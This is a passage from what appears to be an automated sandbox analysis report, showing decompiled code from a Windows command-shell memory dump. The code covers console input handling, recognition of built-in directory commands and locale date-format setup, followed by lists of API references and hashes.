									EnterCriticalSection( *0x183858);
									 *0x17d544 = 0;
									LeaveCriticalSection( *0x183858);
									if(_t142 != 0) {
										RtlFreeHeap(GetProcessHeap(), 0, _t142);
									}
									_t95 = 0;
									_t142 = 0;
								}
								if(_v96 == 0) {
									break;
								}
								_t173 = _t173 | 0xffffffff;
								_v92 = _v92 | 0xffffffff;
								_v80 = _t95;
								if( *_v88 <= 0) {
									break;
								} else {
									while(1) {
										_t152 =  *(_t184 + _t95 * 2) & 0x0000ffff;
										if(_t152 == 0xd) {
											break;
										}
										_t206 = _t152 -  *0x17d0d8; // 0x20
										if(_t206 == 0) {
											_v92 = _t95;
											goto L25;
										} else {
											_t207 = _t152 -  *0x17d0d4; // 0x20
											if(_t207 == 0) {
												_v92 = _t95;
												_v80 = 1;
												L24:
												__eflags = _t173 - 0xffffffff;
												if(_t173 != 0xffffffff) {
													goto L18;
												} else {
													L25:
													__eflags = _t95 - 0xffffffff;
													if(_t95 == 0xffffffff) {
														goto L18;
													} else {
														 *_v88 = _t95;
														 *(_t184 + _t95 * 2) = 0;
														__eflags = _t142;
														if(_t142 == 0) {
															L35:
															_v96 = 1;
														} else {
															_t169 = _t142;
															_t133 = _t184;
															while(1) {
																_t181 =  *_t133;
																__eflags = _t181 -  *_t169;
																if(_t181 !=  *_t169) {
																	break;
																}
																__eflags = _t181;
																if(_t181 == 0) {
																	L32:
																	_t170 = 0;
																	_t134 = 0;
																} else {
																	_t182 =  *((intOrPtr*)(_t133 + 2));
																	__eflags = _t182 -  *((intOrPtr*)(_t169 + 2));
																	if(_t182 !=  *((intOrPtr*)(_t169 + 2))) {
																		break;
																	} else {
																		_t133 = _t133 + 4;
																		_t169 = _t169 + 4;
																		__eflags = _t182;
																		if(_t182 != 0) {
																			continue;
																		} else {
																			goto L32;
																		}
																	}
																}
																L34:
																_v96 = _t170;
																__eflags = _t134;
																if(_t134 != 0) {
																	goto L35;
																}
																goto L36;
															}
															asm("sbb eax, eax");
															_t134 = _t133 | 0x00000001;
															_t170 = 0;
															__eflags = 0;
															goto L34;
														}
														L36:
														_t99 = _v80;
														__eflags = _t99;
														if(__eflags == 0) {
															__eflags = _v92 - 2;
															if(__eflags > 0) {
																__imp___wcsnicmp(_t184, L"cd ", 3);
																_t193 = _t193 + 0xc;
																__eflags = _t99;
																if(__eflags == 0) {
																	L45:
																	_t99 = 1;
																} else {
																	__imp___wcsnicmp(_t184, L"rd ", 3);
																	_t193 = _t193 + 0xc;
																	__eflags = _t99;
																	if(__eflags == 0) {
																		goto L45;
																	} else {
																		__imp___wcsnicmp(_t184, L"md ", 3);
																		_t193 = _t193 + 0xc;
																		__eflags = _t99;
																		if(__eflags == 0) {
																			goto L45;
																		} else {
																			__imp___wcsnicmp(_t184, L"chdir ", 6);
																			_t193 = _t193 + 0xc;
																			__eflags = _t99;
																			if(__eflags == 0) {
																				goto L45;
																			} else {
																				__imp___wcsnicmp(_t184, L"rmdir ", 6);
																				_t193 = _t193 + 0xc;
																				__eflags = _t99;
																				if(__eflags == 0) {
																					goto L45;
																				} else {
																					__imp___wcsnicmp(_t184, L"mkdir ", 6);
																					_t193 = _t193 + 0xc;
																					__eflags = _t99;
																					if(__eflags == 0) {
																						goto L45;
																					} else {
																						__imp___wcsnicmp(_t184, L"pushd ", 6);
																						_t193 = _t193 + 0xc;
																						__eflags = _t99;
																						if(__eflags != 0) {
																							_t99 = _v80;
																						} else {
																							goto L45;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
														_push(_v96);
														_t155 = _t184;
														_push(_t99);
														_push( !(_v44 >> 4) & 0x00000001);
														_push(_v92);
														_t104 = E0017B2BF(_t142, _t184, _a4, _t184, _t190, __eflags);
														__eflags = _t104;
														if(_t104 == 0) {
															_t105 = E00167797(_t155);
															__eflags = _t105;
															if(_t105 != 0) {
																 *0x19c014(0xffffffff);
															}
															_t156 = _t184;
															_t73 = _t156 + 2; // 0xc
															_t177 = _t73;
															do {
																_t106 =  *_t156;
																_t156 = _t156 + 2;
																__eflags = _t106 - _v80;
															} while (_t106 != _v80);
															_t157 = _t156 - _t177;
															__eflags = _t157;
															_v68 = _t157 >> 1;
														} else {
															E00179897();
															_t118 = GetConsoleScreenBufferInfo(_v100,  &_v56);
															__eflags = _t118;
															if(_t118 != 0) {
																_t168 = _v50 - (_v92 + _v108) / _v56;
																__eflags = _t168;
																_v90 = _t168;
																_t190 = _v92;
															}
															_t163 = _t184;
															_t61 = _t163 + 2; // 0xc
															_t178 = _t61;
															do {
																_t119 =  *_t163;
																_t163 = _t163 + 2;
																__eflags = _t119 - _v80;
															} while (_t119 != _v80);
															_v88 = _t163 - _t178 >> 1;
															SetConsoleCursorPosition(_v100, _t190);
															_push( &_v84);
															_push(_t190);
															_push(_v84);
															_push(0x20);
															_push(_v100);
															FillConsoleOutputCharacterW();
															WriteConsoleW(_v120, _t184, _v108,  &_v108, 0);
															_v88 = _v108;
															E001606C0(_t163 - _t178 >> 1);
														}
														__eflags = _t142;
														if(_t142 == 0) {
															_t143 = 0;
															__eflags = 0;
														} else {
															_t143 = 0;
															RtlFreeHeap(GetProcessHeap(), 0, _t142);
														}
														_t159 = _t184;
														_t76 = _t159 + 2; // 0xc
														_t173 = _t76;
														do {
															_t107 =  *_t159;
															_t159 = _t159 + 2;
															__eflags = _t107 - _t143;
														} while (_t107 != _t143);
														_t77 = (_t159 - _t173 >> 1) + 1; // 0x9
														_t108 = _t77;
														_v112 = _t108;
														_t142 = HeapAlloc(GetProcessHeap(), _t143, _t108 + _t108);
														__eflags = _t142;
														if(_t142 == 0) {
															_t87 = 0;
														} else {
															_t173 = _v112;
															E00161040(_t142, _t173, _t184);
															goto L7;
														}
													}
												}
											} else {
												_t95 = _t95 + 1;
												if(_t95 <  *_v88) {
													continue;
												} else {
													goto L18;
												}
											}
										}
										goto L67;
									}
									_t173 = _t95;
									_t95 = _v92;
									goto L24;
								}
								goto L67;
							}
							L18:
							if(_t142 != 0) {
								RtlFreeHeap(GetProcessHeap(), 0, _t142);
							}
							_t87 = _v96;
						}
					}
				}
				L67:
				_pop(_t185);
				_pop(_t189);
				_pop(_t141);
				return E00166FD0(_t87, _t141, _v16 ^ _t193, _t173, _t185, _t189);
			}







































































                                  0x00173506
                                  0x0017350e
                                  0x00173511
                                  0x00173518
                                  0x0017351e
                                  0x00173524
                                  0x00173526
                                  0x0017352a
                                  0x0017352e
                                  0x00173534
                                  0x0017353b
                                  0x0017353f
                                  0x00173546
                                  0x00173546
                                  0x00173551
                                  0x00173932
                                  0x00173938
                                  0x00173949
                                  0x00173952
                                  0x00173958
                                  0x00173557
                                  0x00173559
                                  0x0017355a
                                  0x00173561
                                  0x00000000
                                  0x00173567
                                  0x00173567
                                  0x0017356e
                                  0x00000000
                                  0x00173588
                                  0x00173588
                                  0x00173598
                                  0x0017359c
                                  0x0017359e
                                  0x001735a0
                                  0x001735a3
                                  0x001735a7
                                  0x001735af
                                  0x001735b3
                                  0x001735b7
                                  0x001735bb
                                  0x001735bf
                                  0x001735c4
                                  0x001735ca
                                  0x001735d0
                                  0x001735d6
                                  0x001735dc
                                  0x001735dc
                                  0x001735e1
                                  0x001735f8
                                  0x00173603
                                  0x00173607
                                  0x0017361a
                                  0x0017361e
                                  0x0017365a
                                  0x0017365a
                                  0x00173620
                                  0x00173626
                                  0x00173634
                                  0x00173639
                                  0x00173641
                                  0x0017364e
                                  0x0017364e
                                  0x00173654
                                  0x00173656
                                  0x00173656
                                  0x00173661
                                  0x00000000
                                  0x00000000
                                  0x00173667
                                  0x0017366a
                                  0x0017366f
                                  0x00173676
                                  0x00000000
                                  0x00173678
                                  0x00173678
                                  0x00173678
                                  0x0017367f
                                  0x00000000
                                  0x00000000
                                  0x00173681
                                  0x00173688
                                  0x001736c8
                                  0x00000000
                                  0x0017368a
                                  0x0017368a
                                  0x00173691
                                  0x001736ba
                                  0x001736be
                                  0x001736d4
                                  0x001736d4
                                  0x001736d7
                                  0x00000000
                                  0x001736d9
                                  0x001736d9
                                  0x001736d9
                                  0x001736dc
                                  0x00000000
                                  0x001736de
                                  0x001736e2
                                  0x001736e6
                                  0x001736ea
                                  0x001736ec
                                  0x00173729
                                  0x00173729
                                  0x001736ee
                                  0x001736ee
                                  0x001736f0
                                  0x001736f2
                                  0x001736f2
                                  0x001736f5
                                  0x001736f8
                                  0x00000000
                                  0x00000000
                                  0x001736fa
                                  0x001736fd
                                  0x00173714
                                  0x00173714
                                  0x00173716
                                  0x001736ff
                                  0x001736ff
                                  0x00173703
                                  0x00173707
                                  0x00000000
                                  0x00173709
                                  0x00173709
                                  0x0017370c
                                  0x0017370f
                                  0x00173712
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00173712
                                  0x00173707
                                  0x00173721
                                  0x00173721
                                  0x00173725
                                  0x00173727
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00173727
                                  0x0017371a
                                  0x0017371c
                                  0x0017371f
                                  0x0017371f
                                  0x00000000
                                  0x0017371f
                                  0x00173731
                                  0x00173731
                                  0x00173735
                                  0x00173737
                                  0x0017373d
                                  0x00173742
                                  0x00173750
                                  0x00173756
                                  0x00173759
                                  0x0017375b
                                  0x001737db
                                  0x001737dd
                                  0x0017375d
                                  0x00173765
                                  0x0017376b
                                  0x0017376e
                                  0x00173770
                                  0x00000000
                                  0x00173772
                                  0x0017377a
                                  0x00173780
                                  0x00173783
                                  0x00173785
                                  0x00000000
                                  0x00173787
                                  0x0017378f
                                  0x00173795
                                  0x00173798
                                  0x0017379a
                                  0x00000000
                                  0x0017379c
                                  0x001737a4
                                  0x001737aa
                                  0x001737ad
                                  0x001737af
                                  0x00000000
                                  0x001737b1
                                  0x001737b9
                                  0x001737bf
                                  0x001737c2
                                  0x001737c4
                                  0x00000000
                                  0x001737c6
                                  0x001737ce
                                  0x001737d4
                                  0x001737d7
                                  0x001737d9
                                  0x001737e0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x001737d9
                                  0x001737c4
                                  0x001737af
                                  0x0017379a
                                  0x00173785
                                  0x00173770
                                  0x0017375b
                                  0x00173742
                                  0x001737e4
                                  0x001737eb
                                  0x001737ed
                                  0x001737fa
                                  0x001737fb
                                  0x001737ff
                                  0x00173804
                                  0x00173806
                                  0x001738a7
                                  0x001738ac
                                  0x001738ae
                                  0x001738b2
                                  0x001738b2
                                  0x001738b8
                                  0x001738ba
                                  0x001738ba
                                  0x001738bd
                                  0x001738bd
                                  0x001738c0
                                  0x001738c3
                                  0x001738c3
                                  0x001738ca
                                  0x001738ca
                                  0x001738ce
                                  0x0017380c
                                  0x0017380c
                                  0x0017381a
                                  0x00173820
                                  0x00173822
                                  0x0017383b
                                  0x0017383b
                                  0x0017383d
                                  0x00173842
                                  0x00173842
                                  0x00173846
                                  0x00173848
                                  0x00173848
                                  0x0017384b
                                  0x0017384b
                                  0x0017384e
                                  0x00173851
                                  0x00173851
                                  0x00173861
                                  0x00173865
                                  0x0017386f
                                  0x00173870
                                  0x00173871
                                  0x00173875
                                  0x00173877
                                  0x0017387b
                                  0x00173892
                                  0x0017389c
                                  0x001738a0
                                  0x001738a0
                                  0x001738d2
                                  0x001738d4
                                  0x001738e9
                                  0x001738e9
                                  0x001738d6
                                  0x001738d7
                                  0x001738e1
                                  0x001738e1
                                  0x001738eb
                                  0x001738ed
                                  0x001738ed
                                  0x001738f0
                                  0x001738f0
                                  0x001738f3
                                  0x001738f6
                                  0x001738f6
                                  0x001738ff
                                  0x001738ff
                                  0x00173902
                                  0x00173917
                                  0x00173919
                                  0x0017391b
                                  0x0017392e
                                  0x0017391d
                                  0x0017391d
                                  0x00173924
                                  0x00000000
                                  0x00173924
                                  0x0017391b
                                  0x001736dc
                                  0x00173693
                                  0x00173697
                                  0x0017369a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0017369a
                                  0x00173691
                                  0x00000000
                                  0x00173688
                                  0x001736ce
                                  0x001736d0
                                  0x00000000
                                  0x001736d0
                                  0x00000000
                                  0x00173676
                                  0x0017369c
                                  0x0017369e
                                  0x001736ab
                                  0x001736ab
                                  0x001736b1
                                  0x001736b1
                                  0x0017356e
                                  0x00173561
                                  0x0017395a
                                  0x0017395e
                                  0x0017395f
                                  0x00173960
                                  0x0017396b

                                  APIs
                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,0000000A,00000000,00000001), ref: 0017352E
                                  • _get_osfhandle.MSVCRT ref: 0017353F
                                  • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 0017357A
                                  • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20), ref: 001735E1
                                  • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000010), ref: 001735F8
                                  • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20), ref: 00173607
                                  • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00173626
                                  • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00173639
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00173647
                                  • RtlFreeHeap.NTDLL(00000000), ref: 0017364E
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 001736A4
                                  • RtlFreeHeap.NTDLL(00000000), ref: 001736AB
                                  • _wcsnicmp.MSVCRT ref: 00173750
                                  • _wcsnicmp.MSVCRT ref: 00173765
                                  • _wcsnicmp.MSVCRT ref: 0017377A
                                  • _wcsnicmp.MSVCRT ref: 0017378F
                                  • _wcsnicmp.MSVCRT ref: 001737A4
                                  • _wcsnicmp.MSVCRT ref: 001737B9
                                  • _wcsnicmp.MSVCRT ref: 001737CE
                                  • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 0017381A
                                  • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 00173865
                                  • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 0017387B
                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 00173892
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 001738DA
                                  • RtlFreeHeap.NTDLL(00000000), ref: 001738E1
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000009,?,?,?,00000001), ref: 0017390A
                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00173911
                                  • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20), ref: 00173938
                                  • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 00173949
                                  • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20), ref: 00173952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                  • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                  • API String ID: 2991647268-3100821235
                                  • Opcode ID: bbfee6a621b34f8f1eba190fea1f48f19a229d1f7d5430ef25100c65d187a3f6
                                  • Instruction ID: 411355aade3e588dec49347e6e07f8ffc8539784264fa32b808d96ce0b70a5cf
                                  • Opcode Fuzzy Hash: bbfee6a621b34f8f1eba190fea1f48f19a229d1f7d5430ef25100c65d187a3f6
                                  • Instruction Fuzzy Hash: 0FC1D5B1604301AFD7149F28DC89A6B77F5FF88314F04892DF96AC66A0D771CA85DB11
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00163F80, Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 395COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E00163F80() {
				signed int _v8;
				short _v264;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr _t86;
				void* _t87;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				void* _t92;
				short* _t93;
				short* _t94;
				short* _t95;
				short* _t96;
				short* _t97;
				short* _t98;
				short* _t99;
				short* _t100;
				short* _t101;
				short* _t102;
				short* _t103;
				intOrPtr* _t106;
				int _t107;
				int _t108;
				int _t109;
				int _t110;
				int _t111;
				int _t112;
				int _t113;
				int _t114;
				int _t115;
				int _t116;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t126;
				void* _t128;
				void* _t130;
				void* _t132;
				void* _t134;
				int _t136;
				signed int _t138;

				_t33 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t33 ^ _t138;
				_t136 = E001641A4();
				if(GetLocaleInfoW(_t136, 0x1e, 0x17f81c, 8) == 0) {
					_t93 = 0x17f81c;
					_t107 = 8;
					_t118 = ":" - 0x17f81c;
					while(1) {
						_t11 = _t107 + 0x7ffffff6; // 0x7ffffffe
						if(_t11 == 0) {
							break;
						}
						_t91 =  *(_t118 + _t93) & 0x0000ffff;
						if(_t91 == 0) {
							break;
						}
						 *_t93 = _t91;
						_t93 =  &(_t93[1]);
						_t107 = _t107 - 1;
						if(_t107 != 0) {
							continue;
						}
						L33:
						_t93 = _t93 - 2;
						L34:
						 *_t93 = 0;
						goto L1;
					}
					if(_t107 != 0) {
						goto L34;
					}
					goto L33;
				}
				L1:
				if(GetLocaleInfoW(_t136, 0x23,  &_v264, 0x80) == 0) {
					L9:
					 *0x17d540 = 0;
					if(GetLocaleInfoW(_t136, 0x21,  &_v264, 0x80) != 0) {
						_t86 = (_v264 & 0x0000ffff) - 0x30;
						if(_t86 != 0) {
							_t87 = _t86 - 1;
							if(_t87 == 0) {
								 *0x17d540 = 1;
								 *0x17f7f8 = L"dd/MM/yy";
							} else {
								if(_t87 == 1) {
									 *0x17d540 = 2;
									 *0x17f7f8 = L"yy/MM/dd";
								}
							}
						} else {
							 *0x17d540 = _t86;
							 *0x17f7f8 = L"MM/dd/yy";
						}
					}
					 *0x17f620 = 2;
					if(GetLocaleInfoW(_t136, 0x24,  &_v264, 0x80) != 0 && _v264 == 0x31) {
						 *0x17f620 = 4;
					}
					if(GetLocaleInfoW(_t136, 0x1d, 0x17f80c, 8) == 0) {
						_t94 = 0x17f80c;
						_t108 = 8;
						_t120 = "/" - 0x17f80c;
						while(1) {
							_t13 = _t108 + 0x7ffffff6; // 0x7ffffffe
							if(_t13 == 0) {
								break;
							}
							_t84 =  *(_t120 + _t94) & 0x0000ffff;
							if(_t84 == 0) {
								break;
							}
							 *_t94 = _t84;
							_t94 =  &(_t94[1]);
							_t108 = _t108 - 1;
							if(_t108 != 0) {
								continue;
							}
							L45:
							_t94 = _t94 - 2;
							L46:
							 *_t94 = 0;
							goto L16;
						}
						if(_t108 != 0) {
							goto L46;
						}
						goto L45;
					} else {
						L16:
						if(GetLocaleInfoW(_t136, 0x31, 0x17f7a8, 0x20) == 0) {
							_t95 = 0x17f7a8;
							_t109 = 0x20;
							_t122 = L"Mon" - 0x17f7a8;
							while(1) {
								_t15 = _t109 + 0x7fffffde; // 0x7ffffffe
								if(_t15 == 0) {
									break;
								}
								_t83 =  *(_t122 + _t95) & 0x0000ffff;
								if(_t83 == 0) {
									break;
								}
								 *_t95 = _t83;
								_t95 =  &(_t95[1]);
								_t109 = _t109 - 1;
								if(_t109 != 0) {
									continue;
								}
								L53:
								_t95 = _t95 - 2;
								L54:
								 *_t95 = 0;
								goto L17;
							}
							if(_t109 != 0) {
								goto L54;
							}
							goto L53;
						}
						L17:
						if(GetLocaleInfoW(_t136, 0x32, 0x17f768, 0x20) == 0) {
							_t96 = 0x17f768;
							_t110 = 0x20;
							_t124 = L"Tue" - 0x17f768;
							while(1) {
								_t17 = _t110 + 0x7fffffde; // 0x7ffffffe
								if(_t17 == 0) {
									break;
								}
								_t82 =  *(_t124 + _t96) & 0x0000ffff;
								if(_t82 == 0) {
									break;
								}
								 *_t96 = _t82;
								_t96 =  &(_t96[1]);
								_t110 = _t110 - 1;
								if(_t110 != 0) {
									continue;
								}
								L61:
								_t96 = _t96 - 2;
								L62:
								 *_t96 = 0;
								goto L18;
							}
							if(_t110 != 0) {
								goto L62;
							}
							goto L61;
						}
						L18:
						if(GetLocaleInfoW(_t136, 0x33, 0x17f728, 0x20) == 0) {
							_t97 = 0x17f728;
							_t111 = 0x20;
							_t126 = L"Wed" - 0x17f728;
							while(1) {
								_t19 = _t111 + 0x7fffffde; // 0x7ffffffe
								if(_t19 == 0) {
									break;
								}
								_t81 =  *(_t126 + _t97) & 0x0000ffff;
								if(_t81 == 0) {
									break;
								}
								 *_t97 = _t81;
								_t97 =  &(_t97[1]);
								_t111 = _t111 - 1;
								if(_t111 != 0) {
									continue;
								}
								L69:
								_t97 = _t97 - 2;
								L70:
								 *_t97 = 0;
								goto L19;
							}
							if(_t111 != 0) {
								goto L70;
							}
							goto L69;
						}
						L19:
						if(GetLocaleInfoW(_t136, 0x34, 0x17f6e8, 0x20) == 0) {
							_t98 = 0x17f6e8;
							_t112 = 0x20;
							_t128 = L"Thu" - 0x17f6e8;
							while(1) {
								_t21 = _t112 + 0x7fffffde; // 0x7ffffffe
								if(_t21 == 0) {
									break;
								}
								_t80 =  *(_t128 + _t98) & 0x0000ffff;
								if(_t80 == 0) {
									break;
								}
								 *_t98 = _t80;
								_t98 =  &(_t98[1]);
								_t112 = _t112 - 1;
								if(_t112 != 0) {
									continue;
								}
								L77:
								_t98 = _t98 - 2;
								L78:
								 *_t98 = 0;
								goto L20;
							}
							if(_t112 != 0) {
								goto L78;
							}
							goto L77;
						}
						L20:
						if(GetLocaleInfoW(_t136, 0x35, 0x17f6a8, 0x20) == 0) {
							_t99 = 0x17f6a8;
							_t113 = 0x20;
							_t130 = L"Fri" - 0x17f6a8;
							while(1) {
								_t23 = _t113 + 0x7fffffde; // 0x7ffffffe
								if(_t23 == 0) {
									break;
								}
								_t79 =  *(_t130 + _t99) & 0x0000ffff;
								if(_t79 == 0) {
									break;
								}
								 *_t99 = _t79;
								_t99 =  &(_t99[1]);
								_t113 = _t113 - 1;
								if(_t113 != 0) {
									continue;
								}
								L85:
								_t99 = _t99 - 2;
								L86:
								 *_t99 = 0;
								goto L21;
							}
							if(_t113 != 0) {
								goto L86;
							}
							goto L85;
						}
						L21:
						if(GetLocaleInfoW(_t136, 0x36, 0x17f668, 0x20) == 0) {
							_t100 = 0x17f668;
							_t114 = 0x20;
							_t132 = L"Sat" - 0x17f668;
							while(1) {
								_t25 = _t114 + 0x7fffffde; // 0x7ffffffe
								if(_t25 == 0) {
									break;
								}
								_t78 =  *(_t132 + _t100) & 0x0000ffff;
								if(_t78 == 0) {
									break;
								}
								 *_t100 = _t78;
								_t100 =  &(_t100[1]);
								_t114 = _t114 - 1;
								if(_t114 != 0) {
									continue;
								}
								L93:
								_t100 = _t100 - 2;
								L94:
								 *_t100 = 0;
								goto L22;
							}
							if(_t114 != 0) {
								goto L94;
							}
							goto L93;
						}
						L22:
						if(GetLocaleInfoW(_t136, 0x37, 0x17f628, 0x20) == 0) {
							_t101 = 0x17f628;
							_t115 = 0x20;
							_t134 = L"Sun" - 0x17f628;
							while(1) {
								_t27 = _t115 + 0x7fffffde; // 0x7ffffffe
								if(_t27 == 0) {
									break;
								}
								_t77 =  *(_t134 + _t101) & 0x0000ffff;
								if(_t77 == 0) {
									break;
								}
								 *_t101 = _t77;
								_t101 =  &(_t101[1]);
								_t115 = _t115 - 1;
								if(_t115 != 0) {
									continue;
								}
								L101:
								_t101 = _t101 - 2;
								L102:
								 *_t101 = 0;
								goto L23;
							}
							if(_t115 != 0) {
								goto L102;
							}
							goto L101;
						}
						L23:
						if(GetLocaleInfoW(_t136, 0xe, 0x17f7fc, 8) == 0) {
							_t102 = 0x17f7fc;
							_t116 = 8;
							_t134 = "." - 0x17f7fc;
							while(1) {
								_t29 = _t116 + 0x7ffffff6; // 0x7ffffffe
								if(_t29 == 0) {
									break;
								}
								_t76 =  *(_t134 + _t102) & 0x0000ffff;
								if(_t76 == 0) {
									break;
								}
								 *_t102 = _t76;
								_t102 =  &(_t102[1]);
								_t116 = _t116 - 1;
								if(_t116 != 0) {
									continue;
								}
								L109:
								_t102 = _t102 - 2;
								L110:
								 *_t102 = 0;
								goto L24;
							}
							if(_t116 != 0) {
								goto L110;
							}
							goto L109;
						}
						L24:
						if(GetLocaleInfoW(_t136, 0xf, 0x17f7e8, 8) == 0) {
							_t103 = 0x17f7e8;
							_t116 = 8;
							_t136 = "," - 0x17f7e8;
							while(1) {
								_t31 = _t116 + 0x7ffffff6; // 0x7ffffffe
								if(_t31 == 0) {
									break;
								}
								_t75 =  *(_t103 + _t136) & 0x0000ffff;
								if(_t75 == 0) {
									break;
								}
								 *_t103 = _t75;
								_t103 =  &(_t103[1]);
								_t116 = _t116 - 1;
								if(_t116 != 0) {
									continue;
								}
								L117:
								_t103 = _t103 - 2;
								L118:
								 *_t103 = 0;
								goto L25;
							}
							if(_t116 != 0) {
								goto L118;
							}
							goto L117;
						}
						L25:
						__imp__setlocale(".OCP");
						return E00166FD0(0, _t92, _v8 ^ _t138, _t116, _t134, _t136, 0);
					}
				} else {
					_t89 = "1";
					_t106 =  &_v264;
					while(1) {
						_t116 =  *_t106;
						if(_t116 !=  *_t89) {
							break;
						}
						if(_t116 == 0) {
							L7:
							_t90 = 0;
							L8:
							 *0x17d0cc = _t90;
							goto L9;
						}
						_t116 =  *((intOrPtr*)(_t106 + 2));
						_t5 = _t89 + 2; // 0x410000
						if(_t116 !=  *_t5) {
							break;
						}
						_t106 = _t106 + 4;
						_t89 = _t89 + 4;
						if(_t116 != 0) {
							continue;
						}
						goto L7;
					}
					asm("sbb eax, eax");
					_t90 = _t89 | 0x00000001;
					goto L8;
				}
			}

























































                                  0x00163f8b
                                  0x00163f92
                                  0x00163fa3
                                  0x00163fb0
                                  0x0016e1fa
                                  0x0016e204
                                  0x0016e209
                                  0x0016e20b
                                  0x0016e20b
                                  0x0016e213
                                  0x00000000
                                  0x00000000
                                  0x0016e215
                                  0x0016e21c
                                  0x00000000
                                  0x00000000
                                  0x0016e21e
                                  0x0016e221
                                  0x0016e224
                                  0x0016e227
                                  0x00000000
                                  0x00000000
                                  0x0016e22f
                                  0x0016e22f
                                  0x0016e232
                                  0x0016e234
                                  0x00000000
                                  0x0016e234
                                  0x0016e22d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016e22d
                                  0x00163fb6
                                  0x00163fcd
                                  0x00164011
                                  0x0016401c
                                  0x00164032
                                  0x0016403b
                                  0x0016403e
                                  0x0016e23c
                                  0x0016e23f
                                  0x0016e263
                                  0x0016e26d
                                  0x0016e241
                                  0x0016e244
                                  0x0016e24a
                                  0x0016e254
                                  0x0016e254
                                  0x0016e244
                                  0x00164044
                                  0x00164044
                                  0x00164049
                                  0x00164049
                                  0x0016403e
                                  0x0016405e
                                  0x00164074
                                  0x00164080
                                  0x00164080
                                  0x0016409c
                                  0x0016e27c
                                  0x0016e286
                                  0x0016e28b
                                  0x0016e28d
                                  0x0016e28d
                                  0x0016e295
                                  0x00000000
                                  0x00000000
                                  0x0016e297
                                  0x0016e29e
                                  0x00000000
                                  0x00000000
                                  0x0016e2a0
                                  0x0016e2a3
                                  0x0016e2a6
                                  0x0016e2a9
                                  0x00000000
                                  0x00000000
                                  0x0016e2b1
                                  0x0016e2b1
                                  0x0016e2b4
                                  0x0016e2b6
                                  0x00000000
                                  0x0016e2b6
                                  0x0016e2af
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x001640a2
                                  0x001640a2
                                  0x001640b4
                                  0x0016e2be
                                  0x0016e2c8
                                  0x0016e2cd
                                  0x0016e2cf
                                  0x0016e2cf
                                  0x0016e2d7
                                  0x00000000
                                  0x00000000
                                  0x0016e2d9
                                  0x0016e2e0
                                  0x00000000
                                  0x00000000
                                  0x0016e2e2
                                  0x0016e2e5
                                  0x0016e2e8
                                  0x0016e2eb
                                  0x00000000
                                  0x00000000
                                  0x0016e2f3
                                  0x0016e2f3
                                  0x0016e2f6
                                  0x0016e2f8
                                  0x00000000
                                  0x0016e2f8
                                  0x0016e2f1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016e2f1
                                  0x001640ba
                                  0x001640cc
                                  0x0016e300
                                  0x0016e30a
                                  0x0016e30f
                                  0x0016e311
                                  0x0016e311
                                  0x0016e319
                                  0x00000000
                                  0x00000000
                                  0x0016e31b
                                  0x0016e322
                                  0x00000000
                                  0x00000000
                                  0x0016e324
                                  0x0016e327
                                  0x0016e32a
                                  0x0016e32d
                                  0x00000000
                                  0x00000000
                                  0x0016e335
                                  0x0016e335
                                  0x0016e338
                                  0x0016e33a
                                  0x00000000
                                  0x0016e33a
                                  0x0016e333
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016e333
